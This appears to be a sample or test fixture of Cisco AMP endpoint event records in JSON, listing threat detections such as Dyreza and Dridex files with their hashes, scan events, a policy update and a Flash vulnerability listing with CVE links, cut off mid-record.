-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft 
Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash 
Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nis
t.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https
